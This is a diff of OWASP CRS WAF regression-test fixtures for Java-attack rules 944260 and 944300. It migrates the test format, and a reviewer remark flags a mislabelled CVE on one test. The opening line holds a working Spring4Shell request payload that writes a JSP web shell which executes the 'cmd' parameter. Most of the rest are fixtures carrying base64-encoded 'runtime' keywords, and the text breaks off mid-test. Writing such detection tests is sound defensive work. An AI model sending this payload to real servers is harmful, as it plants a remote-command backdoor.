"class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" + output: + log: + expect_ids: [944260] diff --git a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml index 412a3b6..9ab732e 100644 
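Review bot: The `desc: "CVE-2022-22963"` on test_id 1 does not match its request body: the `handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(...)` form parameter is the WebLogic admin-console vector, whereas CVE-2022-22963 is, as far as I recall, the Spring Cloud Function SpEL routing-expression issue, which this body never exercises. The commit only migrates the fixture format and carries the label over, so the regression test stays attributed to the wrong advisory in any coverage listing keyed on desc. I would relabel it to describe what the payload actually is, e.g. `desc: "WebLogic console handle parameter (FileSystemXmlApplicationContext)"`, and keep a CVE reference only where the body really reproduces that vector. The second test's `desc: "Spring Framework RCE"` does match its `class.module.classLoader.resources...` body and can stay as is.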
--- a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml +++ b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml 
@@ -1,6697 +1,6605 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944300.yaml" - description: "Positive tests for rule 944300" +rule_id: 944300 tests: - - test_title: 944300-1 + - test_id: 1 desc: "Argument test includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cnVudGltZQ" + output: + log: + expect_ids: [944300] + - test_id: 2 desc: "Argument name includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cnVudGltZQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cnVudGltZQ=test" + output: + log: + expect_ids: [944300] + - test_id: 3 desc: "Cookie test includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cnVudGltZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cnVudGltZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 4 desc: "Cookie name includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cnVudGltZQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 
944300-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cnVudGltZQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 5 desc: "Request header test includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cnVudGltZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cnVudGltZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 6 desc: "XML attribute value includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: 
"HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 7 desc: "XML element value includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cnVudGltZQ" + output: + log: + expect_ids: [944300] + - test_id: 8 desc: "Nested XML element value includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - 
uri: "/post" - version: "HTTP/1.0" - data: "cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cnVudGltZQ" + output: + log: + expect_ids: [944300] + - test_id: 9 desc: "Content-Type text/plain includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cnVudGltZQ" + output: + log: + expect_ids: [944300] + - test_id: 10 desc: "Content-Type application/json arg value includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"cnVudGltZQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"cnVudGltZQ\"}" + output: + log: + expect_ids: [944300] + - test_id: 11 desc: "Content-Type application/json arg name includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"cnVudGltZQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"cnVudGltZQ\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 12 desc: "Argument test includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HJ1bnRpbWU" + output: + log: + expect_ids: [944300] + - test_id: 13 desc: "Argument name includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HJ1bnRpbWU=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HJ1bnRpbWU=test" + output: + log: + expect_ids: [944300] + - test_id: 14 desc: "Cookie test includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: 
"127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HJ1bnRpbWU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HJ1bnRpbWU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 15 desc: "Cookie name includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HJ1bnRpbWU=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HJ1bnRpbWU=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + 
output: + log: + expect_ids: [944300] + - test_id: 16 desc: "Request header test includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HJ1bnRpbWU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HJ1bnRpbWU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 17 desc: "XML attribute value includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + 
method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 18 desc: "XML element value includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HJ1bnRpbWU" + output: + log: + expect_ids: [944300] + - test_id: 19 desc: "Nested XML element value includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HJ1bnRpbWU" + output: + log: + expect_ids: [944300] + - test_id: 20 desc: "Content-Type text/plain includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HJ1bnRpbWU" + output: + log: + expect_ids: [944300] + - test_id: 21 desc: "Content-Type application/json arg value includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"HJ1bnRpbWU\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"HJ1bnRpbWU\"}" + output: + log: + expect_ids: [944300] + - test_id: 22 desc: "Content-Type application/json arg name includes keyword HJ1bnRpbWU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"HJ1bnRpbWU\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"HJ1bnRpbWU\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 23 desc: "Argument test includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BydW50aW1l" - output: - log_contains: "id \"944300\"" - - test_title: 944300-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BydW50aW1l" + output: + log: + expect_ids: [944300] + - test_id: 24 desc: "Argument name includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BydW50aW1l=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BydW50aW1l=test" + output: + log: + expect_ids: [944300] + - test_id: 25 desc: "Cookie test includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BydW50aW1l - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-26 
+ - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BydW50aW1l + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 26 desc: "Cookie name includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BydW50aW1l=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BydW50aW1l=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 27 desc: "Request header test includes keyword BydW50aW1l" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - 